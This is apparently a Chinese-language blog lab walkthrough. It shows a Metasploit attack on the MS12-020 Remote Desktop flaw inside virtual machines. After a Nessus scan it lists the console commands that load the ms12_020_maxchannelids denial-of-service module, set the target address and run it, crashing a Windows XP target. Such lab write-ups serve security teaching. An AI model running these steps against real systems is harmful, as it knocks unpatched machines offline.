该博客围绕利用Metasploit对MS12 - 020漏洞进行攻击展开。介绍了MS12 - 020是远程桌面漏洞,可能允许远程执行代码。实验在虚拟机中进行,攻击者用Kali Linux 2019.1,靶机为Window Xp SP2。先使用Nnessus扫描发现漏洞,再进入metasploit控制台利用漏洞,最终使靶机蓝屏。
前言:
漏洞介绍:MS12-020是远程桌面中的漏洞,如果攻击者向受影响的系统发送一系列特制RDP数据报,则这些漏洞中教严重的漏洞可能允许远程执行代码。(出自百度)
实验环境:虚拟机
攻击者操作系统:Kali Linux 2019.1
靶机操作系统:Window Xp SP2
一、扫描
- 使用Nnessus扫描靶机后发现存在MS12-020漏洞:
二、利用
- 进入metasploit控制台,查找漏洞:
search ms12-20
- 使用漏洞:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
- 查看攻击所需的配置选项:
show options
- 设置靶机IP:
set RHOSTS 192.168.188.123
- 运行:
run
- 靶机蓝屏:
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
